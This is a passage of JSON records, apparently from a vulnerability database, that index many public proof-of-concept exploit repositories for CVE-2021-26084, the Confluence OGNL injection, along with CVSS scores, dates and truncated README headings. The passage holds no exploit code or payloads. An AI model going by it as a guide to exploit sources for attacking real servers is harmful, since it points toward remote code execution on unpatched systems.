false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-11T18:14:44", "id": "63E9680A-4D3C-5C4C-9EB3-63F2DB64F66D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-08T12:41:20", "description": "# CVE-2021-26084\nProof of concept for CVE-2021-26084. \n\nConfluen...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-01T15:19:19", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-01-08T04:36:30", "id": "BFA4DC64-759A-5113-842C-923C98D12B44", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-18T22:04:53", "description": "# CVE-2021-26084\n# confluence\u8fdc\u7a0b\u4ee3\u7801\u6267\u884cRCE\n\n## Code By:Jun_sheng @\u6a58\u5b50...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-25T03:07:28", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-01-02T13:22:29", "id": "BF930E9B-ED2F-52A3-87ED-2082926ED9B1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:33:44", "description": "# CVE-2021-26084_PoC...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-18T07:33:24", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-12-01T09:03:37", "id": "2BE90BD5-68B3-521E-B2DF-923D04CC1189", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:51", "description": "# CVE-2021-26084-Confluence-OGNL\nasjhdsajdlksavksapfokaajsdlksaj...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-06T06:55:15", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-06T06:58:34", "id": "C58D4A9D-FE17-5F41-8B1B-800E327BB411", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:58", "description": "# confluence-rce-poc\nSetting up ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-04T14:53:38", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-04T15:16:43", "id": "07C144EB-D3A5-58B3-8077-F40B0DD3A8C9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:36:37", "description": "# Confluence Server Webwork Pre-Auth OGNL Injection (CVE-2021-26...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-02T03:11:50", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-02T03:16:43", "id": "CE477D7E-7586-5C82-8DCC-033C48461E66", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:29:20", "description": "# Confluence_CVE-2021-26084\nRemote Code Execution on Confluence ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-01T12:19:53", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-26T06:18:41", "id": "4D1ED4A9-C9F8-55A0-8B96-52D4C189331C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:59", "description": "# CVE-2021-26084\n\n- An OGNL injection vulnerability exists that ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-05T09:27:55", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-11-16T03:56:14", "id": "4A995433-D0C6-5BF7-9A78-962229397A7D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-23T04:27:16", "description": "# CVE-2021-26084\nAtlassian Confluence CVE-2021-26084 one-liner ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T01:15:16", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-02-22T21:21:20", "id": "A4DD8B03-CBED-5284-83EA-6C21FE0EA21C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:10:07", "description": "# ConfluCHECK\nPython 3 script to identify CVE-2021-26084 via net...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-23T19:45:31", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-11-24T19:02:52", "id": "6BB53677-CE73-5D62-9443-E0D71E27C1C8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-13T01:55:30", "description": "# CVE-2021-26084\n\nCVE-2021-26084 Remote Code Execution on Conflu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T09:50:26", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-05-12T08:46:05", "id": "3B46E8A8-B6A0-5055-9270-F6B2A1F204FD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-12T12:49:04", "description": "# CVE-2021-26084\n\nCVE-2021-26084 Remote Code Execution on Conflu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T09:50:26", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-05-12T08:46:05", "id": "24774A85-D9E4-55DC-8D1F-EC48351B23C1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-19T18:17:57", "description": "* CVE-2021-26084\n--------\n** Description\n - POC of CVE-2021-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-13T06:29:51", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-19T15:09:22", "id": "C0A9F032-9822-59DC-94CC-20C15DEE0FED", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-12T12:56:33", "description": "# CVE-2021-26084 - Confluence Server Webwork OGNL injection\n\n- A...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T07:15:17", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-05-11T16:16:03", "id": "1E5E573E-3F0A-5243-BE87-314E2BDC4107", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T03:22:59", "description": "# CVE-2021-26084\nCVE-2021-26084 - Confluence Pre-Auth RCE | O...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-31T16:33:32", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-04-05T00:01:16", "id": "28091F24-DF21-50D7-8BBB-F4C77F5B07C9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-23T12:57:50", "description": "# CVE-2021-26084\n<p align=\"center\">\n <img src=\"https://user-ima...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T13:32:42", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-04-23T04:56:52", "id": "2C7E80B0-6BD9-590B-A1D6-F10D66CD7379", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-20T13:25:44", "description": "# CVE-2021-26084\nCVE-2021-26084\uff0cAtlassian Confluence OGNL\u6ce8\u5165\u6f0f\u6d1e\n\nA...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-26T06:01:38", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-02-20T09:26:02", "id": "3E0FF5E7-F93E-588A-B40A-B3381FB12F73", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-20T05:31:08", "description": "# CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection\n### U...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T07:45:55", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-05-20T00:59:13", "id": "47577DF3-ABF2-57F3-A35B-0496F4EE7DD9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-01T00:29:34", "description": "# CVE-2021-26084\nConfluence OGNL injection\n\nCVE-2021-26084 is an...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-09T06:19:13", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-31T23:43:54", "id": "A9A21055-01FA-5B3E-84B3-E294A9641418", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-13T09:42:12", "description": "# CVE-2021-26084 (PoC) | Confluence Server Webwork OGNL injectio...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 